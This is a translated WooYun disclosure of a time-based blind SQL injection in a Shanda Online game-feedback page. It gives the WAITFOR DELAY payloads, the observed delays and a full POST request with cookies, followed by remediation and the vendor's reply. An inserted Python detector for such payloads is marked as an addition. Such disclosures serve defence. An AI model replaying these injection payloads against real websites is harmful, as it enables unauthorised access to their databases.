Vulnerability Summary

Defect ID: wooyun-2014-077459

Title: SQL injection in another sub-site of Shanda Online (盛大在线)

Vendor: Shanda Online (盛大在线)

Author: Eoh

Submitted: 2014-09-26 23:32

Fixed: 2014-11-10 23:34

Published: 2014-11-10 23:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure timeline:

2014-09-26: Details sent to the vendor, awaiting vendor response
2014-09-27: Vendor confirmed; details disclosed to the vendor only
2014-10-07: Details disclosed to core white hats and domain experts
2014-10-17: Details disclosed to regular white hats
2014-10-27: Details disclosed to intern white hats
2014-11-10: Details disclosed to the public

Summary:

Details:

User input is not properly sanitized of dangerous characters before being used in a SQL query.

Proof of concept:

Vulnerable parameter: txtGameUserName
Payloads tested and the observed HTTP response times (the response delay tracks the injected WAITFOR DELAY, which is the time-based blind SQL injection signal):
123'; waitfor delay '0:0:3'  ->  3 seconds
123'; waitfor delay '0:0:9'  ->  9 seconds
123'; waitfor delay '0:0:6'  ->  6 seconds

POST request:
POST /VocGameUserBlockList.aspx HTTP/1.1
Content-Length: 5986
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://voc.sdo.com
Cookie: ASP.NET_SessionId=srabsmfpweyhdp55rz2g21vs; CheckCode=RLT0X
Host: voc.sdo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnGo=%e6%9f%a5%e8%af%a2&ddlGameList=-1&ddlMonth=1&ddlYear=2013&txtGameUserName=n7shji8y';%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=/wEWRwLS9pqFDgL4wYbfAwL4wbLkBALw7Mj0BALx7Mj0BALy7Mj0BALz7Mj0BAL07Mj0BAL17Mj0BAL27Mj0BALn7Mj0BALo7Mj0BALw7Ij3BALw7IT3BALw7ID3BALph9WsAQK3kvf7BALgh5mvAQLnh7WvAQLmh%2bWsAQKhzfP4BQLjh7WvAQLlh5mvAQL9h%2b2sAQK7jK3RBwK7jI3RBwLK8sPlDwKz6J6lAgLlh%2bmsAQLlh/2sAQLgh9WsAQLjh5mvAQKhzYP4BQKTmuuuBALyh7WvAQLIv6zZBgLl1PKjDQKjzfP4BQLhh5mvAQKegf24BALxgoDkBQLMv4CyDgLlh9WsAQKhzY/4BQLLv6zZBgLKv6zZBgLlh9msAQLjh9msAQKGpY/kCQLmh5mvAQLmh7WvAQLF1JHlAwKu/5iOCAKcgbW7BALlh%2b2sAQLmh7mvAQLyh7mvAQKK5vGPDwLu55DcCALGraPYAwLjh7mvAQKI4YSYAgKVn6nwCgKq//SOCALV/7yOCALhh9msAQLR66H6AQKltqWkDgKltr2iDgKYstehBAKBk/m1C/l8t%2b0ta39wtQp89jXpRANZsxu/&__VIEWSTATE=/wEPDwUJLTU3Nzk1MDI4D2QWAgIBD2QWCAIDD2QWAgIBDxYCHgRUZXh0BcYTPGRpdiBjbGFzcz0iY2xlYXIiPjwvZGl2PiAgPGRsPjxkdCBjbGFzcz0iU1RZTEUyIj7mnIDmlrDlhbPms6g8L2R0PjxkZD48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDE3MDAiPuWGoOWGm%2bi2s%2beQg%2be7j%2beQhuWcqOe6vzwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDAzMDAiPumbtuS4lueVjDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDIzMDAiPuWuiOaKpOS5i%2bWJkTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xNDYiPuaCjeWwhuS8oOS4ljwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD03NzciPuaYn%2bi%2bsOadgDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD03MzMiPuS7meWig%2bS8oOivtOaJi%2bacuueJiDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD05OTEwMDAzNDIiPuWkuuWuneS8oOS4luKAnOeureeBteiniemGkuKAnTwvYT4gIDwvZGw%2bPC9kZD48ZGl2IGNsYXNzPSJjbGVhciI%2bPC9kaXY%2bICA8ZGw%2bPGR0IGNsYXNzPSJTVFlMRTIiPuWkp%2bWei%2ba4uOaIjzwvZHQ%2bPGRkPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEiPuS8oOWlh%2bS4lueVjDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD00Ij7ng63ooYDkvKDlpYc8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MzkiPuW9qeiZueWym09ubGluZTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD02MSI%2b6ay85ZC554Gv5aSW5LygPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTcwIj7ljYPlubQzPC
Confirmed with sqlmap (screenshot: voc_sqli.jpg).
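To make the time-based proof above checkable from the defender's side, here is an added Python example (not part of the original report) that decodes a form body shaped like the request above, flags any field carrying a T-SQL WAITFOR DELAY payload, and checks that observed response latency tracks the requested delay. The sample body is constructed, with the ViewState blob replaced by a placeholder, and the three timing observations are taken from the report.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample body in the shape of the report's request; the real
# __VIEWSTATE/__EVENTVALIDATION blobs are thousands of bytes, so a placeholder stands in.
SAMPLE_BODY = (
    "btnGo=%e6%9f%a5%e8%af%a2&ddlGameList=-1&ddlMonth=1&ddlYear=2013"
    "&txtGameUserName=n7shji8y';%20waitfor%20delay%20'0:0:9'%20--%20"
    "&__VIEWSTATE=VIEWSTATE_PLACEHOLDER"
)

# Delay requested by each payload and the latency the report observed for it.
REPORTED_TIMINGS = [
    ("123'; waitfor delay '0:0:3'", 3.0),
    ("123'; waitfor delay '0:0:9'", 9.0),
    ("123'; waitfor delay '0:0:6'", 6.0),
]

# Closing quote, statement separator, then T-SQL WAITFOR DELAY 'h:m:s'.
TIME_DELAY_RE = re.compile(
    r"""['"]\s*;\s*waitfor\s+delay\s+'(\d+):(\d+):(\d+)'""", re.IGNORECASE
)


def requested_delay(value: str):
    """Seconds of delay a WAITFOR DELAY payload in `value` asks for, or None."""
    m = TIME_DELAY_RE.search(value)
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s


def find_time_based_sqli(body: str):
    """Return [(param, delay_seconds)] for form fields carrying a delay payload."""
    findings = []
    for pair in body.split("&"):  # split before decoding: a literal '&' in a value is %26
        name, _, raw = pair.partition("=")
        delay = requested_delay(unquote_plus(raw))
        if delay is not None:
            findings.append((unquote_plus(name), delay))
    return findings


def timing_confirms_injection(observations, tolerance=1.0):
    """True when every observed latency is at least the delay its payload requested."""
    for payload, observed in observations:
        delay = requested_delay(payload)
        if delay is None or observed < delay - tolerance:
            return False
    return True
```

Run `find_time_based_sqli` over decoded request bodies in a WAF or access-log pipeline; a hit on a field like txtGameUserName whose latency also satisfies `timing_confirms_injection` is a high-confidence detection rather than a keyword match.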


Remediation:

Use parameterized SQL statements instead of concatenating user input into queries.

Copyright notice: when reposting, credit the source as Eoh@WooYun


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-09-27 12:25

Vendor reply:

Thanks for the report. We ask all white hats to submit detailed vulnerability proofs in future submissions. Thanks again!

Latest status:

None


Vulnerability Rating:

Comments

  1. 2014-09-27 17:39 | 子非海绵宝宝 Certified white hat ( Core white hat | Rank:1044 Vulnerabilities:106 | Carry on the SpongeBob spirit! You are not SpongeBob, how...)

    20.... marking my spot

  2. 2014-11-11 22:53 | idarker ( Passer-by | Rank:0 Vulnerabilities:1 | Love life, ╮(╯▽╰)╭)

    20 ..... that really is enough....